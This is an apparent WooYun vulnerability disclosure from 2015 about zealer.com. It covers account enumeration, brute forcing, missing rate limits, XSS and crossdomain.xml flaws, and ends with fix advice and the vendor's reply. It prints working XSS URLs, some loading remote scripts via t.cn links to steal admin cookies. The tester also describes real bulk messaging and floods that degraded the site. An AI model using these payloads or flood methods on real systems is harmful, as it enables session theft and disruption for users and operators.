当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0113747

漏洞标题:Zealer应用层若干漏洞打包(批量刷赞私信xss打后台改价格删订单)

相关厂商:ZEALER.COM

漏洞作者: kevinchowsec

提交时间:2015-05-18 11:26

修复时间:2015-07-06 15:10

公开时间:2015-07-06 15:10

漏洞类型:xss跨站脚本攻击

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-05-18: 细节已通知厂商并且等待厂商处理中
2015-05-22: 厂商已经确认,细节仅向厂商公开
2015-06-01: 细节向核心白帽子及相关领域专家公开
2015-06-11: 细节向普通白帽子公开
2015-06-21: 细节向实习白帽子公开
2015-07-06: 细节向公众公开

简要描述:

我在2015-03-26对Zealer一次检测,发现Zealer的若干应用层漏洞,从业务逻辑到web安全漏洞打包,发送到wooyun,审核不通过,原因是“问题均相对鸡肋,可有更有效的危害?”,我便把报告发送到“[email protected]”,若干天后回复我“我们的技术团队让我向你转达谢意,你的建议对我们非常重要,谢谢。”
然而,5月10日我对zealer再一次访问,并对之前的漏洞进行验证,发现均无修复,感觉“duang”!
我今天还是把漏洞列出来,并加上危害利用。
2015-03-26报告如下:
今天不谈王自如,主角是Zealer开发工程师,发现问题分点陈列如下:

详细说明:

1.1、业务逻辑漏洞
①、明文传输敏感信息
通过抓包工具,发现客户端与服务端交互数据包为明文传输,在网络传输中未采用可靠加密方式。
②、对批量高并发数据无限制机制
通过工具提交交互数据包,服务端没有对批量高并发提交的数据进行检测与限制。
1.2、以上2个脆弱性组合成的详细的漏洞证明或威胁请参考1.5
-------------------------------------------------------------
1.3、Web安全漏洞
①、XSS跨站脚本
检测过程中发现主站(www.zealer.com)与子站(fix.zealer.com)存在多处跨站漏洞。
②、flash跨域策略文件crossdomain.xml配置不正确
检测过程中发现主站(www.zealer.com)与子站(fix、static、img)的crossdomain.xml未正确配置。
1.4、详细的漏洞证明或威胁请参考1.7

漏洞证明:

1.5、业务逻辑漏洞证明
①、猜解Zealer数据库中存在的用户名,遭社会工程学威胁

1用户注册-测试用户是否存在1.png


②、猜解Zealer数据库中存在的邮箱,遭社会工程学威胁

1用户注册-测试邮箱是否存在2.png


③、批量注册用户,遭资源耗费威胁

1用户注册-批量注册用户.png


④、暴力破解系统存在用户密码,遭信息泄露威胁

2用户登录-暴力破解用户密码.png


⑤、批量指定发送找回密码邮件,遭骚扰用户威胁

3密码找回-暴力发送找回密码邮件.png


⑥、批量指定发送手机绑定验证码,遭骚扰用户威胁

4手机绑定-暴力发送绑定验证码.png


⑦、暴力破解手机绑定验证码,遭信息泄露威胁

4手机绑定-暴力破解绑定验证码.png


4手机绑定-暴力破解绑定验证码2.png


批量向用户发送钓鱼私信,20W条数据,100个并发↓

批量向用户发送私信.jpg


批量向用户发送私信2.jpg


sixin.png


批量点赞某条评论,2W条数据,50个并发↓

刷赞1.png


ddos2.png


由于对批量高并发数据无限制机制,导致官网极其容易被ddos,以上的12W条攻击,已经造成用户打开页面迟缓,丢包现象严重。
下图为我在远程服务器访问www.zealer.com的截图
(PS:网络管理员可以查查5.12的夜晚流量走势图)↓

ddos.jpg


1.6、业务逻辑漏洞修复建议请参考1.9
-------------------------------------------------------------
1.7、Web安全漏洞证明
①、XSS跨站脚本5个,详情如下:

http://fix.zealer.com/login/OrdersCheck?callback=<script src=http://t.cn/RAFkqBv></script>


xss1.png


http://fix.zealer.com/login/login?callback=<script>alert('xss test')</script>


xss2.png


http://www.zealer.com/reg?from=%3E%22%27%3E%3Cscript%3Ealert%28%27xss test%27%29%3C%2Fscript%3E


xss3.png


http://www.zealer.com/reg?from=Index&redirect=http://www.zealer.com/"/><script src=http://t.cn/RAFkQQo></script>


xss4.png


http://www.zealer.com/reg?from=Index"/><script>alert('xss test')</script>&redirect=http://www.zealer.com/


xss5.png


打到的后台地址和cookie:

cookie.png


fix后台管理界面(打单、用户信息查询等):

fixadmin.png


rephone后台管理界面(价格修改,产品下架,优先码生成等):

duangadmin.png


②、flash跨域策略文件crossdomain.xml配置不正确

http://www.zealer.com/crossdomain.xml
http://fix.zealer.com/crossdomain.xml
http://static.zealer.com/crossdomain.xml
http://img.zealer.com/crossdomain.xml


crossdomain.png


1.8、Web安全漏洞修复建议请参考2.0

修复方案:

1.9、业务逻辑漏洞修复建议
①、客户端与服务端数据传输使用可靠加密方式;
②、对批量高并发数据进行检测发现与限制。
2.0、Web安全漏洞修复建议
①、修复XSS跨站漏洞,严格过滤危险关键字符;
②、正确配置flash跨域策略文件crossdomain.xml。

版权声明:转载请注明来源 kevinchowsec@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-05-22 15:08

厂商回复:

安全等级确实做得不足,业务快速快展的阶段没有做好安全这一块,感谢给我们提前做了一次预警,接下来我们会尽快花时间修改相关的漏洞。

最新状态:

暂无